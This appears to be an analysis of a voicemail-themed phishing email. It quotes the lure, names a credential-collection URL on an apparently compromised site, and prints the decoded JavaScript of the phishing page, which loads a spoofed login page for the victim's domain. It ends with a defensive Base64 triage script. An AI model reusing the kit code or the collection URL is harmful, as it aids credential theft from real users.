You've got 3 MISSED-CALL messages from WIRELESS-CALLER : Monday, April 19, 2021 - SPAM WARNING!!


Hello Recipient,

Your cal­ler le­ft you 3 v­o­ic­em­ai­l me­s­sa­ges.

V­oi­ce - Mes­sa­ge for: recipient@domain.suffix (MI­SS­ED CA­LL­S)

CAL­LER NUM­BER : +44 335970973

Pl­ea­se do­w­nlo­ad at­ta­chm­ent to li­ste­n to Me­ss­age

Mes­sa­ges wi­ll au­to dele­te in 2 h­ou­rs

As you can see, the page appears to just record the email address:

The site to which your credentials will be sent appears to be http://mtu.edu.ng/wp-content/uploads/2020/9/9/h.php, which is Base64-encoded (an encoding, not encryption) in the JavaScript code on the site:

Their HTML code, once decoded from Base64, reads:

<html>
<head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script
src="https://cdnjs.cloudflare.com/ajax/libs/html2canvas/0.4.1/html2canvas.min.js"
integrity="sha256-c3RzsUWg+y2XljunEQS0LqWdQ04X1D3j22fd/8JCAKw="
crossorigin="anonymous"
></script>
<script
src="https://cdnjs.cloudflare.com/ajax/libs/FileSaver.js/1.3.8/FileSaver.min.js"
integrity="sha256-FPJJt8nA+xL4RU6/gsriA8p8xAeLGatoyTjldvQKGdE="
crossorigin="anonymous"
></script>
</head>
<body>
<div id="capture" style="padding: 10px; color: black"></div>
<script type="text/javascript">
try {
var email = atob(e);
} catch (e) {
var email = e;
}
var domain = e.split("@");

setTimeout(() => {
loadPages(
eur +
"?e=" +
e +
"&ep=" +
ep +
"&en=" +
btoa(e) +
"&eu=" +
domain[1]
);
}, 2000);

function loadPages(load) {

var testURL = load;

$.ajax({
url: atob(hp),
method: "POST",
data: { url: testURL },
success: function (response) {
response = response.replace(/href="\//g, 'href="' + testURL + "/");
response = response.replace(/src="\//g, 'src="' + testURL + "/");
response = response.replace(
/content="\//g,
'content="' + testURL + "/"
);

$("#capture").html(response);
// console.log(response);

},
});
}

</script>
</body>
</html>
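
Because the collection URL and the recipient address are only Base64-wrapped, they can be recovered from an attachment like this without opening it in a browser. The following triage helper is an added example, not code from the phishing page or from the original post; the function names are hypothetical, and the sample attachment with its example.com and example.invalid values is constructed (only the variable names e, eur and hp and the integrity string come from the script above).

```javascript
// Added triage example (not the kit's code): list quoted Base64 literals in an
// HTML attachment that decode to a URL or an email address.

// A quoted run of 16+ Base64 characters with optional padding.
const B64_LITERAL = /(["'])([A-Za-z0-9+\/]{16,}={0,2})\1/g;

function decodeIfText(b64) {
  if (b64.length % 4 !== 0) return null; // not canonical Base64
  const buf = Buffer.from(b64, "base64");
  if (buf.toString("base64") !== b64) return null; // does not round-trip
  const text = buf.toString("latin1");
  return /^[\x20-\x7e]+$/.test(text) ? text : null; // printable ASCII only
}

function classify(text) {
  if (/^https?:\/\/\S+$/i.test(text)) return "url";
  if (/^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(text)) return "email";
  return null;
}

function findEncodedIndicators(html) {
  const findings = [];
  for (const m of html.matchAll(B64_LITERAL)) {
    const text = decodeIfText(m[2]);
    const kind = text ? classify(text) : null;
    if (kind) findings.push({ kind, decoded: text, offset: m.index });
  }
  return findings;
}

// Constructed sample. Variable names e, eur and hp follow the script above;
// their values are placeholders, encoded here so the plaintext stays visible.
const enc = (s) => Buffer.from(s, "utf8").toString("base64");
const SAMPLE = `<html><head>
<script integrity="sha256-c3RzsUWg+y2XljunEQS0LqWdQ04X1D3j22fd/8JCAKw="></script>
<script>
var e = "${enc("recipient@example.com")}";
var eur = "https://login.example.invalid";
var hp = "${enc("https://collector.example.invalid/h.php")}";
var label = "VoicemailPlayerWidgetV2x";
</script></head></html>`;

console.log(findEncodedIndicators(SAMPLE));
```

Run it with Node.js. The integrity hash and the ordinary identifier in the sample are not reported, because neither decodes to printable text that looks like a URL or an address.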
